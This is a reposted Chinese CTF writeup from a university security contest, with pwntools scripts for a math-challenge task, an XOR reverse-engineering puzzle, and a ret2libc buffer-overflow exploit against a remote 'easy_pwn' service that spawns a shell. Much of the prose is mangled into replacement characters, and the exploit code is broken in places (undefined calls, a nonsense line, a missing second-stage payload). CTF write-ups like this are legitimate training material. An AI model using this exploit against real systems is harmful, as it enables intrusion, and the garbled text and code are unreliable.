广东外语外贸大学第三届网络安全大赛Writeup
发布日期:2021-05-12 20:19:13
浏览次数:6
分类:精选文章
本文共 2393 字,大约阅读时间需要 7 分钟。
��������������������������������������������������� Writeup
Msic
������������������������������������������������������������������������������������150������������������������������������������������������������������������������������������������������������
���������������
from pwn import *context.log_level = 'debug'p = remote("183.129.189.60", 10034)n = 0while n < 150: p.recvuntil("Math problem: ") math = p.recvuntil("=")[:-2] p.sendline(str(eval(math))) sleep(1) n += 1else: p.sendline("cat flag") RE
��������������������������������� Python ���������������������������������������������������������������������
���������������
���������������������Easy Python Decompiler������������������������������������ Python ������������������������������������������������������ ���������������
num = ((input1[i] + i) % 128 + 128) % 128������������(input1[i] + i) % 128���������������
������������������������������������������������������������������������������������������������������������������
a = ['\x1f', '\x12', '\x1d', '(', '0', '4', '\x01', '\x06', '\x14', '4', ',', '\x1b', 'U', '?', 'o', '6', '*', ':', '\x01', 'D', ';', '%', '\x13']l = len(a)la = map(ord, a)for i in range(l-1, 0, -1): a[i-1] = a[i-1] ^ a[i]code = ''for i in range(l): num = (a[i] - i) % 128 code += chr(num)print(code) Pwn
������������������������������������������������������������������������������������������������������������������yz������������������������
���������������
������ ��������� ������ I ������������������ EIP ��������������������� ������������������� GDB attache ������ debugger ������ PERSYSTEMHERE ������������������������ payload trigger /bin/sh ���������������EXP���
# coding:utf-8from pwn import *context.log_level = 'debug'elf = ELF('./easy_pwn')local = 0if local: p = process('./easy_pwn') libc = elf.libcelse: p = remote("183.129.189.60", "10025") libc = ELF('./libc6-i386_2.23.so')main = 0x80492F5def sda(a, s): return p.sendafter(a, s)def sla(a, s): return p.sendlineafter(a, s)def rc(s): return p.recv(s)def ru(s): return p.recvuntil(s)pay = 'I' * 0x10pay += p32(elf.plt['puts']) + p32(main) + p32(elf.got['puts'])sl(pay)ru('\n')puts_addr = u32(rc(4))libc_base = puts_addr - libc.symbols['puts']system = libc_base + libc.symbols['system']binsh = libc_base + libc.search("/bin/sh\x00").next()harray();sla(pay)p.interactive() 发表评论
最新留言
表示我来过!
[***.240.166.169]2025年04月15日 00时10分37秒
关于作者
喝酒易醉,品茶养心,人生如梦,品茶悟道,何以解忧?唯有杜康!
-- 愿君每日到此一游!
推荐文章
Explore Optimization
2021-05-10
Kali Linux 内网渗透教程 - ARP欺骗攻击 | 超详细
2021-05-10
2020Java程序设计基础(华东交通大学)章节测试免费满分答案
2021-05-10
小程序之wx:request(转)
2021-05-10
解决数据库报ORA-02289:序列不存在错误
2021-05-10
map[]和map.at()取值之间的区别
2021-05-11
成功解决升级virtualenv报错问题
2021-05-11
【SQLI-Lab】靶场搭建
2021-05-11
Xception 设计进化
2021-05-11
【Bootstrap5】精细学习记录
2021-05-11
Hololens2开发笔记-捕获照片到内存并上传至服务器(unity)
2021-05-11
SkyWalking性能剖析
2021-05-11
LeetCode197.打家劫舍
2021-05-11
A simple problem HDU-2522 【数学技巧】
2021-05-11
487-3279 POJ-1022【前导0~思维漏洞】
2021-05-11
Struts2-从值栈获取list集合数据(三种方式)
2021-05-11
白红宇的个人博客 - 记录点点滴滴的事 - 您是第 461156996 位访客
访问时间: 2025-05-04 06:25:02
访问IP: 3.144.101.157
Copyright © 2020 - 2025 css8.cn 京ICP备2021015314号-1
手机版